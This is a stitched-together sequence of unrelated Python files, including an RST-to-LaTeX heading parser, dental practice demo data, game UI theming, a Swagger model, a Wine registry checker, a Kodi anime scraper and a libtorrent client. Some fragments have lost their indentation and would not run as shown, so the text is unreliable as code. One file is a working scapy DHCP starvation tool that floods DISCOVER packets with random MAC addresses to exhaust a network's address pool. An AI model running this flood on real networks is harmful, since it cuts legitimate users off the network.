        self.subtitle_end_marker_regex = re.compile(r'[-]{3,}')
        self.subtitle_content_regex = re.compile(
            r'''
            ^                                  # beginning of line
            [ ]                                # one whitespace
            [A-Za-z0-9äöüÄÖÜ]+                 # alphanumerical string, no whitespace
            (?P<subtitle>[A-Za-z0-9äöüÄÖÜ ]+)  # alphanumerical string, whitespace ok
            [A-Za-z0-9äöüÄÖÜ]+                 # alphanumerical string, no whitespace
            [ ]                                # one whitespace
            $                                  # end of line
            ''', re.VERBOSE | re.UNICODE
        )
        # Headings cannot begin with whitespace
        self.h_content_regex = re.compile(
            r'''
            ^                           # beginning of line
            [A-Za-z0-9äöüÄÖÜß(]         # alphanum
            [A-Za-z0-9äöüÄÖÜß,() -]*    # alphanum or space
            [A-Za-z0-9äöüÄÖÜß)]         # alphanum
            $                           # end of line
            ''', re.VERBOSE | re.UNICODE
        )
        # chapter
        self.h1_underlining_regex = re.compile(r'[=]{3,}')
        # section
        self.h2_underlining_regex = re.compile(r'[-]{3,}')
        # subsection
        self.h3_underlining_regex = re.compile(r'[~]{3,}')
        # subsubsection
        self.h4_underlining_regex = re.compile(r'[\^]{3,}')
        # paragraph
        self.h5_underlining_regex = re.compile(r'[*]{3,}')
        # subparagraph
        self.h6_underlining_regex = re.compile(r'[.]{3,}')

    def parse(self, rst_file_content):
        """Parse *rst_file_content* (a list of lines, modified in place).

        Stores title and subtitle on the instance and returns the
        {heading text: label} dict from find_heading_labels().
        """
        self.title = self.find_title(rst_file_content)
        # BUG FIX: the subtitle used to be assigned to
        # self.subtitle_content_regex, clobbering the compiled regex;
        # it belongs in self.subtitle.
        self.subtitle = self.find_subtitle(rst_file_content)
        return self.find_heading_labels(rst_file_content)

    def find_title(self, rst_file_content):
        """Return the over- and underlined document title, or None."""
        print('looking for title ...')
        title = None
        for lineno, line in enumerate(rst_file_content):
            previous_line = ""
            if lineno > 0:
                previous_line = rst_file_content[lineno - 1]
            next_line = ""
            if lineno < len(rst_file_content) - 1:
                next_line = rst_file_content[lineno + 1]
            # title: a content line framed by two equally long '=' markers
            if (
                self.title_start_marker_regex.match(previous_line) and
                self.title_end_marker_regex.match(next_line) and
                (
                    len(self.title_start_marker_regex.match(previous_line).group()) ==
                    len(self.title_end_marker_regex.match(next_line).group())
                ) and
                self.title_content_regex.match(line) and
                not title
            ):
                title = self.title_content_regex.match(line).group('title')
                print('title is:|', title, '|', sep='')
                break
        if not title: print('Could not find title in document.')
        return title

    def find_subtitle(self, rst_file_content):
        """Return the over- and underlined document subtitle, or None."""
        print('looking for subtitle ...')
        subtitle = None
        for lineno, line in enumerate(rst_file_content):
            previous_line = ""
            if lineno > 0:
                previous_line = rst_file_content[lineno - 1]
            next_line = ""
            if lineno < len(rst_file_content) - 1:
                next_line = rst_file_content[lineno + 1]
            # subtitle: a content line framed by two equally long '-' markers
            if (
                self.subtitle_start_marker_regex.match(previous_line) and
                self.subtitle_end_marker_regex.match(next_line) and
                (
                    len(self.subtitle_start_marker_regex.match(previous_line).group()) ==
                    len(self.subtitle_end_marker_regex.match(next_line).group())
                ) and
                self.subtitle_content_regex.match(line) and
                not subtitle
            ):
                subtitle = self.subtitle_content_regex.match(line).group('subtitle')
                print('subtitle is:|', subtitle, '|', sep='')
                break
        if not subtitle: print('Could not find subtitle in document.')
        return subtitle

    def find_heading_labels(self, rst_file_content):
        """Replace underlined headings with raw-LaTeX commands in place.

        A heading is a content line preceded by a blank line and followed
        by an underlining at least as distinctive as the heading itself;
        the underlining character selects the LaTeX level.  Returns a dict
        mapping heading text to the generated label.
        """
        print('looking for headings ...')
        headings_dict = {}
        # (level number, LaTeX sectioning command, underlining regex);
        # the underlining characters are mutually exclusive, so at most
        # one level can match a given line.
        levels = [
            (1, 'chapter', self.h1_underlining_regex),
            (2, 'section', self.h2_underlining_regex),
            (3, 'subsection', self.h3_underlining_regex),
            (4, 'subsubsection', self.h4_underlining_regex),
            (5, 'paragraph', self.h5_underlining_regex),
            (6, 'subparagraph', self.h6_underlining_regex),
        ]
        for lineno, line in enumerate(rst_file_content):
            previous_line = ""
            if lineno > 0:
                previous_line = rst_file_content[lineno - 1]
            next_line = ""
            if lineno < len(rst_file_content) - 1:
                next_line = rst_file_content[lineno + 1]
            # headings must be preceded by an empty line
            if not (previous_line.isspace() or previous_line == ''):
                continue
            content_match = self.h_content_regex.match(line)
            if not content_match:
                continue
            for number, level, underlining_regex in levels:
                underlining_match = underlining_regex.match(next_line)
                if (
                    underlining_match and
                    len(content_match.group()) == len(underlining_match.group())
                ):
                    print('found a h{0}:'.format(number), line)
                    if level == 'chapter':
                        print('replacing chapter heading')
                    label = self.heading_to_label(line, level)
                    headings_dict[line] = label
                    rst_file_content[lineno] = ':raw-latex:`\\{0}{{{1}}}`'.format(level, line)
                    rst_file_content[lineno + 1] = ':raw-latex:`\\label{{{0}}}`'.format(label)
                    break
        return headings_dict

    def heading_to_label(self, heading_text, level):
        """Build a LaTeX label: lowercase, spaces to dashes, parens dropped."""
        heading_text = heading_text.lower()
        replaced_chars = {
            ' ': '-',
            '(': '',
            ')': ''
        }
        for key, value in replaced_chars.items():
            heading_text = heading_text.replace(key, value)
        return '{0}:{1}'.format(level, heading_text)
|
'''
Provides schema and insert queries for the practitioner table
information about the practitioners (dentists hygienists etc..)
'''
from lib_openmolar.common.db_orm import InsertableRecord
TABLENAME = "practitioners"
class DemoGenerator(object):
    """Generate insert queries that populate the practitioners demo table."""

    def __init__(self, database=None):
        self.length = 4
        self.record = InsertableRecord(database, TABLENAME)
        self.record.remove(self.record.indexOf("time_stamp"))

    def demo_queries(self):
        '''
        return a list of queries to populate a demo database
        '''
        # field/value pairs specific to each demo practitioner; the shared
        # status and modified_by fields are applied to every one of them
        demo_rows = [
            [('user_id', 1), ('type', "dentist")],
            [('user_id', 2), ('type', "dentist")],
            [('user_id', 3), ('type', "dentist"), ('speciality', 'Orthodontics')],
            [('user_id', 4), ('type', "hygienist")],
        ]
        for i, row in enumerate(demo_rows):
            if i:
                # start from a clean record for every practitioner but the first
                self.record.clearValues()
            for field, value in row:
                self.record.setValue(field, value)
            self.record.setValue('status', "active")
            self.record.setValue('modified_by', "demo_installer")
            yield self.record.insert_query
if __name__ == "__main__":
    # Manual smoke test against the demo admin connection.
    from lib_openmolar.admin.connect import DemoAdminConnection
    sc = DemoAdminConnection()
    sc.connect()
    builder = DemoGenerator(sc)
    # `print(...)` as a function call behaves identically on Python 2
    # (parenthesised single argument) and Python 3; the bare `print`
    # statement used before was Python-2-only.
    print(builder.demo_queries())
|
import os
import traceback
from pysollib.mygettext import _
from pysollib.settings import TITLE
from pysollib.settings import VERSION
from pysollib.settings import TOOLKIT, USE_TILE
from pysollib.settings import DEBUG
from pysollib.mfxutil import print_err
if TOOLKIT == 'tk':
if USE_TILE:
from pysollib.tile import ttk
def init_tile(app, top):
    """Make the ttk themes shipped in the data directory available to Tk.

    Looks for <app.dataloader.dir>/themes, appends it to Tcl's auto_path
    and requires every theme package that provides a pkgIndex.tcl.
    """
    themes_dir = os.path.join(app.dataloader.dir, 'themes')
    if not os.path.isdir(themes_dir):
        return
    top.tk.eval('global auto_path; lappend auto_path {%s}' % themes_dir)
    for name in os.listdir(themes_dir):
        if not os.path.exists(os.path.join(themes_dir, name, 'pkgIndex.tcl')):
            continue
        try:
            top.tk.eval('package require ttk::theme::' + name)
        except Exception:
            # a broken theme package must not abort startup
            traceback.print_exc()
def set_theme(app, top, theme):
    """Activate *theme* for ttk widgets on *top*.

    Falls back to the configured default theme (and reports the bad name)
    when ttk does not know *theme*.
    """
    # set theme
    style = ttk.Style(top)
    try:
        style.theme_use(theme)
    except Exception:
        print_err(_('invalid theme name: ') + theme)
        style.theme_use(app.opt.default_tile_theme)
def get_font_name(font):
    """Normalise a font spec to a (family, size, slant, weight) tuple.

    i.e. "helvetica 12" -> ("helvetica", 12, "roman", "normal")
    Under the kivy toolkit the fixed string "helvetica 12" is returned;
    None is returned when Tk cannot parse the font spec.
    """
    if (TOOLKIT == 'kivy'):
        return "helvetica 12"
    from six.moves.tkinter_font import Font
    try:
        f = Font(font=font)
    except Exception:
        print_err(_('invalid font name: ') + font)
        if DEBUG:
            traceback.print_exc()
        return None
    fa = f.actual()
    return (fa['family'], fa['size'], fa['slant'], fa['weight'])
def base_init_root_window(root, app):
    """Apply title, icon name, minimum size and theming to the root window."""
    # root.wm_group(root)
    root.wm_title(TITLE + ' ' + VERSION)
    root.wm_iconname(TITLE + ' ' + VERSION)
    # choose a minimum window size that still fits on small screens
    screen_w, screen_h = root.winfo_screenwidth(), root.winfo_screenheight()
    if screen_w < 640 or screen_h < 480:
        root.wm_minsize(400, 300)
    else:
        root.wm_minsize(520, 360)
    if TOOLKIT == 'gtk':
        pass
    if TOOLKIT == 'kivy':
        pass
    elif USE_TILE:
        # initialise the shipped ttk themes, then activate the configured one
        theme = app.opt.tile_theme
        init_tile(app, root)
        set_theme(app, root, theme)
    else:
        pass
class BaseTkSettings:
    # Shared UI layout constants for the Tk-based toolkits.  Padding values
    # are (x, y) pixel tuples.
    canvas_padding = (0, 0)
    horizontal_toolbar_padding = (0, 0)
    vertical_toolbar_padding = (0, 1)
    toolbar_button_padding = (2, 2)
    toolbar_label_padding = (4, 4)
    if USE_TILE:
        # ttk widgets draw their own borders
        toolbar_relief = 'flat'
        toolbar_borderwidth = 0
    else:
        # classic Tk widgets need explicit relief/border styling
        toolbar_relief = 'raised'
        toolbar_button_relief = 'flat'
        toolbar_separator_relief = 'sunken'
        toolbar_borderwidth = 1
        toolbar_button_borderwidth = 1
|
import sys
# Aggregate a weighted mean from whitespace-separated records on stdin.
# Each input line: n1 n2 p q t tg x — where t is an integer count and x a
# float value; (n1, n2, p, q) forms the grouping key and tg is ignored.
# Output: one line per key: "key total_count weighted_mean".
# NOTE: Python 2 script (print statement on the last line).
g = {}  # key -> sum of x * t
n = {}  # key -> sum of t
for line in sys.stdin:
    (n1, n2, p, q, t, tg, x) = line.strip().split(' ')
    t = int(t)
    x = float(x)
    key = ' '.join((n1,n2,p,q))
    if not key in n:
        n[key] = 0
        g[key] = 0
    n[key] += t
    g[key] += x*t
for key in n:
    print key, n[key], g[key]/n[key]
|
from __future__ import absolute_import, print_function, unicode_literals
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.shortcuts import redirect
from django.contrib.auth.views import logout as original_logout
from loginas import settings as la_settings
from loginas.utils import restore_original_login
def logout(request, next_page=None, template_name='registration/logged_out.html',
           redirect_field_name=REDIRECT_FIELD_NAME, extra_context=None):
    """
    This can replace your default logout view. In you settings, do:

    from django.core.urlresolvers import reverse_lazy
    LOGOUT_URL = reverse_lazy('logout')
    """
    if request.session.get(la_settings.USER_SESSION_FLAG):
        # a "login as" session is active: drop back to the original user
        # instead of logging out completely
        restore_original_login(request)
        return redirect(la_settings.LOGOUT_REDIRECT)
    return original_logout(request, next_page, template_name,
                           redirect_field_name, extra_context)
|
import traceback
import tempfile
import weka.core.jvm as jvm
from weka.flow.control import Flow
from weka.flow.source import ListFiles
from weka.flow.sink import Console
def main():
    """
    Just runs some example code: builds a two-actor flow that lists files
    in the system temp directory and prints the matches to the console.
    """
    # setup the flow
    flow = Flow(name="list files")
    # flow.print_help()

    # source actor: non-recursive file listing of the temp dir,
    # keeping only names that match the regexp
    listfiles = ListFiles()
    listfiles.config["dir"] = str(tempfile.gettempdir())
    listfiles.config["list_files"] = True
    listfiles.config["list_dirs"] = False
    listfiles.config["recursive"] = False
    listfiles.config["regexp"] = ".*r.*"
    # listfiles.print_help()
    flow.actors.append(listfiles)

    # sink actor: print every token with a prefix
    console = Console()
    console.config["prefix"] = "Match: "
    # console.print_help()
    flow.actors.append(console)

    # run the flow; setup() and execute() return an error message or None
    msg = flow.setup()
    if msg is None:
        print("\n" + flow.tree + "\n")
        msg = flow.execute()
        if msg is not None:
            print("Error executing flow:\n" + msg)
    else:
        print("Error setting up flow:\n" + msg)
    flow.wrapup()
    flow.cleanup()
if __name__ == "__main__":
    # Start the JVM, run the example, and always shut the JVM down again.
    try:
        jvm.start()
        main()
    except Exception:
        # Fixed: `except Exception, e` is Python-2-only syntax and the
        # bound name was unused; this form works on Python 2 and 3.
        print(traceback.format_exc())
    finally:
        jvm.stop()
|
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class SeriesActors(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """

    def __init__(self):
        """
        SeriesActors - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        self.swagger_types = {
            'data': 'list[SeriesActorsData]'
        }

        self.attribute_map = {
            'data': 'data'
        }

        self._data = None

    @property
    def data(self):
        """
        Gets the data of this SeriesActors.

        :return: The data of this SeriesActors.
        :rtype: list[SeriesActorsData]
        """
        return self._data

    @data.setter
    def data(self, data):
        """
        Sets the data of this SeriesActors.

        :param data: The data of this SeriesActors.
        :type: list[SeriesActorsData]
        """
        self._data = data

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}
        # dict.items() works on Python 2 and 3 alike, so six.iteritems is
        # not needed here
        for attr, _ in self.swagger_types.items():
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            else:
                result[attr] = value
        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        # Fixed: comparing __dict__ blindly raised AttributeError for
        # operands without a __dict__ (e.g. ints); unrelated types now
        # simply compare unequal.
        if not isinstance(other, SeriesActors):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
|
import os
import sys
import subprocess
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from lutris.util.wineregistry import WineRegistry
# Root directory containing the Wine prefixes whose registry files are validated.
PREFIXES_PATH = os.path.expanduser("~/Games/wine/prefixes")
def get_registries():
    """Collect the paths of all .reg files found in the known Wine prefixes."""
    # Scan every prefix under PREFIXES_PATH plus the default ~/.wine prefix;
    # the latter is an absolute path, so os.path.join ignores PREFIXES_PATH.
    prefixes = os.listdir(PREFIXES_PATH) + [os.path.expanduser("~/.wine")]
    found = []
    for prefix in prefixes:
        prefix_dir = os.path.join(PREFIXES_PATH, prefix)
        found.extend(
            os.path.join(prefix_dir, entry)
            for entry in os.listdir(prefix_dir)
            if entry.endswith(".reg")
        )
    return found
def check_registry(registry_path):
    """Parse a registry file and verify that re-rendering it reproduces the original bytes."""
    with open(registry_path, 'r') as registry_file:
        original_content = registry_file.read()
    try:
        registry = WineRegistry(registry_path)
    except:
        # Report which file broke the parser, then propagate the error.
        sys.stderr.write("Error parsing {}\n".format(registry_path))
        raise
    content = registry.render()
    if content == original_content:
        return
    # Mismatch: dump the rendered output next to this script and open a diff
    # viewer before aborting with a non-zero exit code.
    wrong_path = os.path.join(os.path.dirname(__file__), 'error.reg')
    with open(wrong_path, 'w') as wrong_reg:
        wrong_reg.write(content)
    print("Content of parsed registry doesn't match: {}".format(registry_path))
    subprocess.call(["meld", registry_path, wrong_path])
    sys.exit(2)
# Validate every registry found; check_registry() exits the process with
# status 2 on the first mismatch, so reaching the print means all passed.
registries = get_registries()
for registry in registries:
    check_registry(registry)
print("All {} registry files validated!".format(len(registries)))
|
# -*- coding: utf-8 -*-
import re
from channels import renumbertools
from channelselector import get_thumb
from core import httptools
from core import scrapertools
from core import servertools
from core import tmdb
from core.item import Item
from platformcode import config, logger
from channels import autoplay
# Audio-language map and the derived list used by the language filter.
IDIOMAS = {'latino': 'Latino'}
list_language = IDIOMAS.values()
# Video hosters supported by autoplay for this channel.
list_servers = ['openload',
                'okru',
                'netutv',
                'rapidvideo'
                ]
list_quality = ['default']
# Base URL of the scraped site.
host = "http://www.anitoonstv.com"
def mainlist(item):
    """Build the channel root menu: one entry per site section."""
    logger.info()
    thumb_series = get_thumb("channels_tvshow.png")
    autoplay.init(item.channel, list_servers, list_quality)
    itemlist = list()
    # Every section shares the same action, URL and thumbnail.
    for section in ("Anime", "Series Animadas", "Novedades", "Pokemon"):
        itemlist.append(Item(channel=item.channel, action="lista", title=section,
                             url=host, thumbnail=thumb_series))
    itemlist = renumbertools.show_option(item.channel, itemlist)
    autoplay.show_option(item.channel, itemlist)
    return itemlist
def lista(item):
    """List the shows of a section (or latest episodes for 'Novedades')."""
    logger.info()
    itemlist = []
    data = httptools.downloadpage(item.url).data
    # Collapse newlines/tabs/double spaces/&nbsp; so the regexes match on one line.
    data = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
    if 'Novedades' in item.title:
        # 'Novedades' lives in its own markup block with absolute links.
        patron_cat = '<div class="activos"><h3>(.+?)<\/h2><\/a><\/div>'
        patron = '<a href="(.+?)"><h2><span>(.+?)<\/span>'
    else:
        # Regular sections: locate the <li> whose anchor text is the section title.
        patron_cat = '<li><a href=.+?>'
        patron_cat += str(item.title)
        patron_cat += '<\/a><div>(.+?)<\/div><\/li>'
        patron = "<a href='(.+?)'>(.+?)<\/a>"
    data = scrapertools.find_single_match(data, patron_cat)
    matches = scrapertools.find_multiple_matches(data, patron)
    for link, name in matches:
        if "Novedades" in item.title:
            url = link
            title = name.capitalize()
        else:
            # Section links are relative to the site root.
            url = host + link
            title = name
        # Heuristics to derive the bare show name for renumbering/TMDB lookup.
        if ":" in title:
            cad = title.split(":")
            show = cad[0]
        else:
            if "(" in title:
                cad = title.split("(")
                if "Super" in title:
                    show = cad[1]
                    show = show.replace(")", "")
                else:
                    show = cad[0]
            else:
                show = title
        if "&" in show:
            # NOTE(review): splits on the literal "xy" — looks like a special
            # case for "Pokemon XY&Z"-style titles; confirm before changing.
            cad = title.split("xy")
            show = cad[0]
        context1=[renumbertools.context(item), autoplay.context]
        itemlist.append(
            item.clone(title=title, url=url, plot=show, action="episodios", show=show,
                       context=context1))
    tmdb.set_infoLabels(itemlist)
    return itemlist
def episodios(item):
    """List the episodes of a show, inferring seasons from chapter resets."""
    logger.info()
    itemlist = []
    data = httptools.downloadpage(item.url).data
    # Collapse whitespace/entities so the regexes match on one line.
    data = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
    patron = '<div class="pagina">(.+?)<\/div><div id="fade".+?>'
    data = scrapertools.find_single_match(data, patron)
    patron_caps = "<a href='(.+?)'>Capitulo: (.+?) - (.+?)<\/a>"
    matches = scrapertools.find_multiple_matches(data, patron_caps)
    show = scrapertools.find_single_match(data, '<span>Titulo.+?<\/span>(.+?)<br><span>')
    scrapedthumbnail = scrapertools.find_single_match(data, "<img src='(.+?)'.+?>")
    scrapedplot = scrapertools.find_single_match(data, '<span>Descripcion.+?<\/span>(.+?)<br>')
    # NOTE(review): `i` is never used below.
    i = 0
    temp = 0
    for link, cap, name in matches:
        # A chapter numbered 1 marks the start of a new season.
        if int(cap) == 1:
            temp = temp + 1
        if int(cap) < 10:
            cap = "0" + cap
        season = temp
        episode = int(cap)
        # Remap season/episode according to the channel's renumbering rules.
        season, episode = renumbertools.numbered_for_tratk(
            item.channel, item.show, season, episode)
        date = name
        title = "%sx%s %s (%s)" % (season, str(episode).zfill(2), "Episodio %s" % episode, date)
        # title = str(temp)+"x"+cap+" "+name
        url = host + "/" + link
        if "NO DISPONIBLE" not in name:
            itemlist.append(Item(channel=item.channel, action="findvideos", title=title, thumbnail=scrapedthumbnail,
                                 plot=scrapedplot, url=url, show=show))
    # Offer adding the show to the local video library when supported.
    if config.get_videolibrary_support() and len(itemlist) > 0:
        itemlist.append(Item(channel=item.channel, title="Añadir esta serie a la videoteca", url=item.url,
                             action="add_serie_to_library", extra="episodios", show=show))
    return itemlist
def findvideos(item):
    """Scrape the hoster links of an episode page and build playable items."""
    logger.info()
    itemlist = []
    data = httptools.downloadpage(item.url).data
    data1 = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
    data_vid = scrapertools.find_single_match(data1, '<div class="videos">(.+?)<\/div><div .+?>')
    # name = scrapertools.find_single_match(data,'<span>Titulo.+?<\/span>([^<]+)<br>')
    scrapedplot = scrapertools.find_single_match(data, '<br><span>Descrip.+?<\/span>([^<]+)<br>')
    scrapedthumbnail = scrapertools.find_single_match(data, '<div class="caracteristicas"><img src="([^<]+)">')
    # Each match is (server label, quality label, embed URL).
    itemla = scrapertools.find_multiple_matches(data_vid, '<div class="serv">.+?-(.+?)-(.+?)<\/div><.+? src="(.+?)"')
    for server, quality, url in itemla:
        if "Calidad Alta" in quality:
            quality = quality.replace("Calidad Alta", "HQ")
        server = server.lower().strip()
        # Normalize the site's server labels to the resolver names.
        if "ok" == server:
            server = 'okru'
        if "netu" == server:
            continue
        itemlist.append(item.clone(url=url, action="play", server=server, contentQuality=quality,
                                   thumbnail=scrapedthumbnail, plot=scrapedplot,
                                   title="Enlace encontrado en %s: [%s]" % (server.capitalize(), quality)))
    autoplay.start(itemlist, item)
    return itemlist
def play(item):
    """Resolve the final playable link for the selected episode."""
    logger.info()
    itemlist = []
    # First try the server the item already knows about...
    found = servertools.findvideosbyserver(item.url, item.server)
    # ...and fall back to probing every available server.
    if not found:
        found = servertools.findvideos(item.url, skip=True)
    if found:
        video_url, server_id = found[0][1], found[0][2]
        itemlist.append(Item(channel=item.channel, title=item.contentTitle,
                             action="play", server=server_id,
                             url=video_url, thumbnail=item.thumbnail))
    return itemlist
|
import argparse
import logging
import string
# Silence scapy's noisy runtime warnings before the scapy imports below run.
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy import volatile # noqa: E402
from scapy import sendrecv # noqa: E402
from scapy import config # noqa: E402
from scapy.layers import l2 # noqa: E402
from scapy.layers import inet # noqa: E402
from scapy.layers import dhcp # noqa: E402
from scapy import route # noqa: E402, F401
from scapy import route6 # noqa: E402, F401
def dhcp_flood(**kwargs):
    """Broadcast `count` DHCP DISCOVER frames with random client MACs on `interface`."""
    iface = kwargs["interface"]
    count = kwargs["count"]
    # Alphabet of distinct lowercase hex digits, as bytes, for the random chaddr.
    unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
    discover = (
        l2.Ether(dst="ff:ff:ff:ff:ff:ff")
        / inet.IP(src="0.0.0.0", dst="255.255.255.255")
        / inet.UDP(sport=68, dport=67)
        / dhcp.BOOTP(chaddr=volatile.RandString(12, unique_hexdigits))
        / dhcp.DHCP(options=[("message-type", "discover"), "end"])
    )
    sendrecv.sendp(discover, iface=iface, count=count)
def print_dhcp_response(response):
    """Pretty-print the Ethernet endpoints and DHCP options of a sniffed packet."""
    print("Source: {}".format(response[l2.Ether].src))
    print("Destination: {}".format(response[l2.Ether].dst))
    for option in response[dhcp.DHCP].options:
        if not isinstance(option, tuple):
            # For some reason some options are strings instead of tuples
            option = (option, None)
        name, *values = option
        # "end"/"pad" terminate the meaningful option list.
        if name in ("end", "pad"):
            break
        line = "Option: {} -> {}".format(name, values)
        if name == "message-type" and len(values) == 1:
            # Translate the numeric message type to its symbolic name.
            line = "{} ({})".format(line, dhcp.DHCPTypes.get(values[0], "unknown"))
        print(line)
def dhcp_sniff(**kwargs):
    """Sniff DHCP traffic (UDP ports 67/68) and print each packet via print_dhcp_response."""
    sendrecv.sniff(filter="udp and (port 67 or 68)", prn=print_dhcp_response)
def parse_args():
    """Build and evaluate the command-line interface (flood / sniff subcommands)."""
    parser = argparse.ArgumentParser(description='''
    All your IPs are belong to us.
    ''', formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument(
        '-i', '--interface',
        action='store',
        default=config.conf.iface,
        help='network interface to use'
    )
    # A subcommand is mandatory (argparse makes it optional by default).
    subparsers = parser.add_subparsers(dest='command')
    subparsers.required = True
    flood = subparsers.add_parser('flood')
    flood.add_argument(
        '-c', '--count',
        action='store',
        type=int,
        default=10,
        help='number of addresses to consume'
    )
    subparsers.add_parser('sniff')
    return parser.parse_args()
def main():
    """Dispatch to the handler selected by the parsed subcommand."""
    args = parse_args()
    handlers = {
        "flood": dhcp_flood,
        "sniff": dhcp_sniff,
    }
    handler = handlers[args.command]
    handler(**vars(args))
if __name__ == "__main__":
    main()
|
import os
import pickle
import random
import time
import urllib
try:
import xbmc, xbmcgui
except:
pass
from platformcode import config, logger
# Locate and load the libtorrent binding configured for this platform.
LIBTORRENT_PATH = config.get_setting("libtorrent_path", server="torrent", default='')
from servers import torrent as torr
lt, e, e1, e2 = torr.import_libtorrent(LIBTORRENT_PATH)
from cache import Cache
from dispatcher import Dispatcher
from file import File
from handler import Handler
from monitor import Monitor
from resume_data import ResumeData
from server import Server
# Buffer size in pieces; fall back to 50 (and persist it) on a bad setting.
try:
    BUFFER = int(config.get_setting("bt_buffer", server="torrent", default="50"))
except:
    BUFFER = 50
    config.set_setting("bt_buffer", "50", server="torrent")
# Download directory and MCT behaviour flags.
DOWNLOAD_PATH = config.get_setting("bt_download_path", server="torrent", default=config.get_setting("downloadpath"))
BACKGROUND = config.get_setting("mct_background_download", server="torrent", default=True)
RAR = config.get_setting("mct_rar_unpack", server="torrent", default=True)
msg_header = 'Alfa BT Cliente Torrent'
class Client(object):
    """
    Minimal BitTorrent client that downloads a torrent with libtorrent and
    streams the selected file over a local HTTP server.
    """
    # Trackers announced for every torrent in addition to its own list.
    INITIAL_TRACKERS = ['udp://tracker.openbittorrent.com:80',
                        'udp://tracker.istole.it:80',
                        'udp://open.demonii.com:80',
                        'udp://tracker.coppersurfer.tk:80',
                        'udp://tracker.leechers-paradise.org:6969',
                        'udp://exodus.desync.com:6969',
                        'udp://tracker.publicbt.com:80',
                        'http://tracker.torrentbay.to:6969/announce',
                        'http://tracker.pow7.com/announce',
                        'udp://tracker.ccc.de:80/announce',
                        'udp://open.demonii.com:1337',
                        'http://9.rarbg.com:2710/announce',
                        'http://bt.careland.com.cn:6969/announce',
                        'http://explodie.org:6969/announce',
                        'http://mgtracker.org:2710/announce',
                        'http://tracker.best-torrents.net:6969/announce',
                        'http://tracker.tfile.me/announce',
                        'http://tracker1.wasabii.com.tw:6969/announce',
                        'udp://9.rarbg.com:2710/announce',
                        'udp://9.rarbg.me:2710/announce',
                        'udp://coppersurfer.tk:6969/announce',
                        'http://www.spanishtracker.com:2710/announce',
                        'http://www.todotorrents.com:2710/announce'
                        ] ### Added some trackers from MCT
    # File extensions considered playable, mapped to their MIME type.
    VIDEO_EXTS = {'.avi': 'video/x-msvideo', '.mp4': 'video/mp4', '.mkv': 'video/x-matroska',
                  '.m4v': 'video/mp4', '.mov': 'video/quicktime', '.mpg': 'video/mpeg', '.ogv': 'video/ogg',
                  '.ogg': 'video/ogg', '.webm': 'video/webm', '.ts': 'video/mp2t', '.3gp': 'video/3gpp',
                  '.rar': 'video/unrar'}
    def __init__(self, url=None, port=None, ip=None, auto_shutdown=True, wait_time=20, timeout=5, auto_delete=True,
                 temp_path=None, is_playing_fnc=None, print_status=False):
        """
        Set up the HTTP server, the libtorrent session, the monitor/dispatcher
        threads, and optionally start downloading `url` right away.
        """
        # HTTP server endpoint (random port in 8000-8099 when not given).
        if port:
            self.port = port
        else:
            self.port = random.randint(8000, 8099)
        if ip:
            self.ip = ip
        else:
            self.ip = "127.0.0.1"
        self.server = Server((self.ip, self.port), Handler, client=self)
        # Options
        if temp_path:
            self.temp_path = temp_path
        else:
            self.temp_path = DOWNLOAD_PATH
        self.is_playing_fnc = is_playing_fnc
        self.timeout = timeout
        self.auto_delete = auto_delete
        self.wait_time = wait_time
        self.auto_shutdown = auto_shutdown
        self.buffer_size = BUFFER
        self.first_pieces_priorize = BUFFER
        self.last_pieces_priorize = 5
        self.state_file = "state"
        # Building the add_torrent parameters probes the libtorrent binding;
        # on failure, show an error dialog (if Kodi is present) and bail out.
        try:
            self.torrent_paramss = {'save_path': self.temp_path, 'storage_mode': lt.storage_mode_t.storage_mode_allocate}
        except Exception, e:
            try:
                do = xbmcgui.Dialog()
                e = e1 or e2
                do.ok('ERROR en el cliente BT Libtorrent', 'Módulo no encontrado o imcompatible con el dispositivo.',
                      'Reporte el fallo adjuntando un "log".', str(e))
            except:
                pass
            return
        # State
        self.has_meta = False
        self.meta = None
        self.start_time = None
        self.last_connect = 0
        self.connected = False
        self.closed = False
        self.file = None
        self.files = None
        self._th = None
        self.seleccion = 0
        self.index = 0
        # Session
        self._cache = Cache(self.temp_path)
        self._ses = lt.session()
        #self._ses.listen_on(0, 0) ### ALFA: it blocks repro of some .torrents
        # Load the session state file (if it exists)
        """ ### ALFA: it blocks repro of some .torrents
        if os.path.exists(os.path.join(self.temp_path, self.state_file)):
            try:
                f = open(os.path.join(self.temp_path, self.state_file), "rb")
                state = pickle.load(f)
                self._ses.load_state(state)
                f.close()
            except:
                pass
        """
        self._start_services()
        # Monitor & Dispatcher
        self._monitor = Monitor(self)
        if print_status:
            self._monitor.add_listener(self.print_status)
        self._monitor.add_listener(self._check_meta)
        self._monitor.add_listener(self.save_state)
        self._monitor.add_listener(self.priorize_start_file)
        self._monitor.add_listener(self.announce_torrent)
        if self.auto_shutdown:
            self._monitor.add_listener(self._auto_shutdown)
        self._dispatcher = Dispatcher(self)
